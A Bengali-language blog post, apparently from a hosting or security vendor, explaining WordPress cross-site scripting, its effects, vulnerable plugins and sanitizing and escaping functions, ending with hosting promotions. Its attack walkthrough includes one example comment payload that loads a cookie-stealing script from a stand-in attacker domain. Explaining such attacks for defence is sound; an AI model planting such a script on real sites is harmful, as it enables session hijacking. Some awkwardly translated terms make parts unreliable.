WordPress XSS Attack | উপসর্গ | উদাহরণ

Wordpress Xss
নভে. 29, 2022

Web Application-গুলিতে পাওয়া একটি Security দুর্বলতা Cross-Site Scripting, যা সংক্ষেপে XSS নামেও পরিচিত। WordPress XSS Attack-কারীদের ছদ্মবেশে Malicious content inject করার অনুমতি দেয়। WordPress XSS দুর্বলতা, ব্যবহারকারী-Website Interaction-কেও compromised করে। এটি আক্রমণকারীদের Valid User হিসাবে Malicious content upload করতে, ব্যবহারকারীর certificate এবং তথ্য চুরি করতে, আপনার website-কে বিকৃত করতে এবং আপনার Brand-কে কলঙ্কিত করতে দেয়।

WordPress XSS Exploitation সম্প্রতি খবর এসেছে যে, যখন Software বিশ্লেষণে বিশেষজ্ঞ একটি কোম্পানি WordPress এবং নীচে পাওয়া Cross-Site Scripting দুর্বলতার বিবরণ প্রকাশ করেছে।

WordPress XSS দুর্বলতা হল সবচেয়ে বেশি দেখা দুর্বলতাগুলির মধ্যে একটি, তবুও এগুলিকে সবচেয়ে বেশি উপেক্ষা করা হয়। XSS হল একটি Cyber ত্রুটি যা ব্যবহারকারীদের (অথবা ব্যবহারকারী হিসাবে জাহির করা হ্যাকারদের) নির্বিচারে Input permission দিয়ে একটি page-এ ক্ষতিকর code inject করতে দেয়।

XSS Exploitation সঞ্চিত এবং প্রতিফলিতদের মধ্যে শ্রেণীবদ্ধ করা হয়ঃ

  1. সংরক্ষিত Cross-Site Scripting মানে Hacker একটি দুর্বল page-এ একটি ক্ষতিকর Script Injection করেছে, যেটি প্রতিবারই চালানো হয় যখন কোনও সন্দেহ জনক শিকার সংক্রামিত page-এ যায়।
  2. প্রতিফলিতCross-Site Scripting যখন একজন আক্রমণকারী একটি একক HTTP request-এর মধ্যে ক্ষতিকর Code Inject করে এবং Injection করা payload-টি অন্তর্ভুক্ত করা হয় যাতে এটি কার্যকর করা রোধ করার জন্য কোনও নিরাপত্তা ব্যবস্থা নেওয়া হয় না। Injection করা payload web application-এ কোথাও সংরক্ষণ করা হয় না, এটি প্রতিফলিত XSS কে আলাদা করে তোলে।

কিভাবে XSS আক্রমণ করা হয় তা এখানে :

  1. Hacker আপনার Website-এ একটি account তৈরি করে।
  2. Hacker পর্যবেক্ষণ করে যে আপনার Website-এ একটি সংরক্ষিত XSS দুর্বলতা রয়েছে। যদি কেউ এতে HTML tag সহ একটি মন্তব্য post করে, তাহলে tag-গুলি যেমন আছে তেমনই প্রদর্শিত হবে এবং যেকোনো Script tag চলতে শুরু করবে।
  3. একটি Article-এর comment section-এ Hacker একটি Script tag সহ Insert text করে। যেমন: I am in love with your website <script src="https://mallorysevilsite.com/authstealer.js">
  4. যখন একজন ব্যবহারকারী (U) comment-সহ page-টি load করে, তখন Script tag-টি চলে এবং U-এর অনুমোদন cookie চুরি করে।
  5. চুরি হওয়া cookie Hacker-এর গোপন server-এ পাঠানো হয় যা তাকে সন্দেহজনক ব্যবহারকারী U এর ছদ্মবেশ ধারণ করতে সক্ষম করে।
Icon Code -
Icon Code -

300+ পরীক্ষার ফলসহ চূড়ান্ত WordPress security checklist পান

XSS Exploitation আপনাকে আপনার ওইয়েবসাইট থেকে লগ আউট করতে পারে। এটি আপনার ছদ্মবেশ ধারণ করতে এবং আপনার ব্র্যান্ড-এর চিত্রকে কলঙ্কিত করতেও ব্যবহার করা যেতে পারে। XSS দুর্বলতাকে কাজে লাগিয়ে হ্যাকাররা কী করতে সক্ষম তার একটি তালিকা রয়েছে ৷ এখানে সেগুলির কিছু আছেঃ

চুরি করা Cookies

cookie চুরি XSS দুর্বলতার একটি সাধারণ Exploitation । Cookies হল ছোট ফাইল, যা ব্যবহারকারী এবং ওয়েবসাইট-এর জন্য নির্দিষ্ট ডাটা রাখে। হ্যাকাররা চুরি করা cookie ব্যবহার করে ভ্যালিড ব্যবহারকারী হিসেবে ছদ্মবেশ ধারণ করতে পারে এবং ক্ষতিকর কাজের জন্যে এক্সেস ব্যবহার করতে পারে।

Compromised password

Password manager ব্যবহারকারীদের জন্য বিভিন্ন ওয়েবসাইট-এর একাউন্ট পরিচালনা করা সুবিধাজনক করে তোলে। Password manager ব্যবহারকারীদের জন্য Auto-fill password। হ্যাকাররা একটি password input তৈরি করতে দুর্বলতা ব্যবহার করতে পারে। যখন Password manager স্বয়ংক্রিয়ভাবে Password-টি পূরণ করে তখন Hacker Password-টি পড়ে এবং এটি তার নিজের Domain–এ পাঠায়। এখন, হ্যাকাররা একটি valid ব্যবহারকারী হিসাবে জাহির করতে পারে এবং আপনার ওয়েবসাইট-এর এক্সেস পেতে পারে।

Port scan

যারা দুর্বল Website পরিদর্শন করে তাদের স্থানীয় network-এ Port scan চালানোর জন্যও XSS ব্যবহার করা যেতে পারে। যদি নেটওয়ার্ক-এ এক্সেস পাওয়া যায় তাহলে আক্রমণকারী নেটওয়ার্ক-এর অন্যান্য device hack করতে পারে। এই ধরনের আক্রমণ চালানোর জন্য আক্রমণকারীরা Code Inject করে যা অভ্যন্তরীণ নেটওয়ার্ক স্ক্যান করে এবং আক্রমণকারীকে রিপোর্ট করে।

Cross site request জালিয়াতি

Cross site request Forgery(CSRF) আক্রমণকারীদের শেষ ব্যবহারকারীদের অবাঞ্ছিত কাজ সম্পাদন করতে বাধ্য করার ক্ষমতা প্রদান করে। Website-এর উপর নির্ভর করে আক্রমণকারী একটি সংযোগের request করতে পারে, একটি ম্যাসেজ পাঠাতে পারে, login certificate পরিবর্তন করতে পারে, Cryptocurrency স্থানান্তর করতে পারে বা source code সংগ্রহস্থলে একটি ব্যাকডোর করতে পারে।

Kilgar

JavaScript keyboard Capturing করতে এটি ব্যবহার করা যেতে পারে। JavaScript coder-দের একটি দুর্বল পেইজ-এ ব্যবহারকারীর দ্বারা সম্পাদিত keystroke-গুলি Log করার ক্ষমতা প্রদান করে। এসবকিছু বাণিজ্যিক website কিছু কোড উপলব্ধ করে যা click, Mobile gestures বা input আকারে দর্শকের গতিবিধি লগ করতে ব্যবহার করা যেতে পারে। এগুলি ক্ষতিকর প্রাণীদের হাতে বিপর্যয়কর হতে পারে।

আমাদের Intelligent firewall এবং malware scanner দেখুন।

XSS হল সবচেয়ে সাধারণ দুর্বলতা যা প্রতি বছর হাজার হাজার Website-এ ক্ষতিকারক Actor-দের Backdoor entry প্রদান করে। এগুলি WordPress XSS Exploitation-এর কয়েকটি সাম্প্রতিক উদাহরণ।

Exploit the Slimstat plugin

Slimstat একটি জনপ্রিয় Web Analytics Plug-in যা সম্প্রতি সঞ্চিত XSS দুর্বলতা পাওয়া গেছে। Slimstat real time-এ Website Analytics track করার জন্য ব্যবহার করা হয়। এটি access log, Returning গ্রাহক এবং নিবন্ধিত ব্যবহারকারী, JavaScript events ইত্যাদির পরিসংখ্যান নিরীক্ষণ এবং রিপোর্ট করে। দুর্বলতাকে কাজে লাগিয়ে হ্যাকার যে পরিমাণ Website data access করতে পারে তা কল্পনা করুন।

দুর্বলতা 4.8 এবং নীচের সংস্করণে উপস্থিত ছিল। এটি Plugin access log কার্যকারিতাতে নির্বিচারে JavaScript code injection করার অনুমতি দেয় না। যে Website-গুলি WordPress-এর সর্বশেষ সংস্করণ ব্যবহার করছিল এবং Astra WAF এর সুরক্ষায় ছিল, সেগুলি আক্রমণকারীদের থেকে নিরাপদ ছিল ৷

Facebook Messenger Live Chat

WordPress-এর মাধ্যমে, AJAX Functionality page পুনরায় load করার প্রয়োজন ছাড়াই Script থেকে data প্রেরণ এবং গ্রহণ করা সহজ করে তোলে। Work update_zb_fbc_code যে কেউ access-যোগ্য।

Work wp_ajax_update_zb_fbc_code শুধুমাত্র অনুমোদিত ব্যবহারকারীদের জন্য নির্ধারিত এবং wp_ajax_nopriv_update_zb_fbc_code অসুবিধাপ্রাপ্ত ব্যবহারকারীদের জন্য। উভয়ই একই function ব্যবহার করে “update_zb_fbc_code“. এটি যেকোনো ব্যবহারকারীকে Plugin settings পরিবর্তন করতে দেয়। ক্ষতিকর actor-রা গোপনীয় তথ্যে অগ্রাধিকার এক্সেস এই দুর্বলতা ব্যবহার করতে পারে।

WordPress file update করুন

WP v5.11 এবং নীচের সাথে সম্পর্কিত সমস্যাগুলি সমাধান করার দ্রুততম এবং সহজ উপায় হল WordPress-কে সর্বশেষ সংস্করণে আপডেট করা।

Input যাচাই করুন

সার্ভার-এ পাঠানোর আগে সমস্ত input data পরীক্ষা করুন এবং যাচাই করুন। শুধুমাত্র valid, বিশ্বস্ত ব্যবহারকারীদের কাছ থেকে input গ্রহণ করুন। উদাহরণস্বরূপ: ব্যবহারকারীর দ্বারা ইনপুট করা email-id যাচাই করতে নিম্নলিখিত ফাংশন-টি অনুসরণ করুন

  1. Filter_var PHP Function
  2. Filter_var($_GET[‘email’], FILTER_VALIDATE_EMAIL)
  3. is_email

Data Sanitize করুন

HTML markup-এর অনুমতি দেয় এমন সাইট-গুলিতে ব্যবহারকারীর দ্বারা data input Sanitize করার সুপারিশ করা হয়। সম্ভাব্য ক্ষতিকারক markup-এর ডাটা পরিষ্কার করে আপনি নিশ্চিত করতে পারেন যে data আপনার ব্যবহারকারী বা আপনার database-এর কোনো ক্ষতি করে না। WordPress-এর অবিশ্বস্ত Data entry filter করার জন্য দুর্দান্ত বৈশিষ্ট্য রয়েছে। এখানে WP command-গুলির একটি তালিকা রয়েছে যা আপনি আপনার Data Sanitize করতে ব্যবহার করতে পারেন।

  • sanitize_email
  • sanitize_file_name
  • sanitize_text_field
  • esc_url_raw
  • sanitize_option
  • sanitize_key
  • sanitize_mime_type
  • wp_kses
  • Sanitize_meta

Escape data

Data Escaping মানে প্রবেশ করা Data sensors করে Data security নিশ্চিত করা। এটি নিশ্চিত করে যে ডাটা-র মূল অক্ষরগুলি খারাপ উপায়ে ভুল ব্যাখ্যা করা হয় না। WordPress যে পাঁচটি মৌলিক Escaping function প্রদান করে তা হল:

  • esc_html
  • esc_url
  • esc_js
  • esc_attr
  • esc_textarea

Output-এ Data Encode করুন

সমস্ত HTTP প্রতিক্রিয়া Encode করুন যা ব্যবহারকারীর দ্বারা প্রবেশ করা data Output করে। Encodeing শুধুমাত্র প্রতিটি অক্ষরকে তার HTML নামে রূপান্তর করছে। আপনি ব্যবহার করতে পারেন Content type এবং X-Content-Type-Browsers. এটি বিকল্প শিরোনামে উদ্দেশ্যমূলক পদ্ধতিতে প্রতিক্রিয়াগুলি ব্যাখ্যা করে ।

একটি Web application firewall ব্যবহার করুন

আপনার Website-এ একটি নিরাপত্তা প্রহরী থাকা সবসময় সাহায্য করে। WAF বা Web application firewall সম্ভাব্য দুর্বলতার বিরুদ্ধে নিরাপত্তা প্রদান করে। Astra WAF ক্ষতিকর Traffic filter করে এবং আপনার Website-এ সুরক্ষা প্রদান করে। এটি XSS, SQLi, CSRF, bad bot, OWASP শীর্ষ 10 এবং 100+ অন্যান্য Cyber আক্রমণকে block করে। আমাদের Intelligent firewall আপনার Website Visitor pattern সনাক্ত করে এবং স্বয়ংক্রিয়ভাবে ক্ষতিকর Hacker-দের block করে।

Wordpress Xss Attack থেকে Astra Web Application সুরক্ষা দেয়
WordPress XSS Attack থেকে Astra web application সুরক্ষা দেয়

গড়ে, একটি Website-কে প্রতিদিন 44 বার Malware দ্বারা আক্রমণ করা হয়।

Free Website Toolkit

Money Back Guarantee

If you’re unhappy for any reason, let us know why. Our friendly support guy is standing by. If you do decide we’re not the right host for you though, we’ll give you a hassle-free refund. We may have to stock up on tissues if you cancel though because we hate break-ups, but we promise, no hard feelings. Just cancel your account within your first 30-days for a full refund, or receive a prorated refund of unused service after 30-days. It’s that easy.

Free Domain Registration

In order to qualify for (1) one free domain name registration, you must sign up for a 12, 24 or 36 month Bitbyhost Shared, Web hosting and WordPress plan. Offer only applies to domains available only .com at the time of hosting signup, and on their initial purchase term. This offer is NOT available under any other hosting plans, nor can it be combined with any other offers. After the first year, your domain will renew at the regular rate.
If your hosting plan includes a free domain and you cancel your hosting within the first year, a non-refundable $12.08 USD domain fee (+ any applicable taxes) for the domain name will apply. Please note that newly registered domains cannot be transferred to another registrar during the first 60 days of the registration period.

Discount will be automatically applied to your cart at checkout.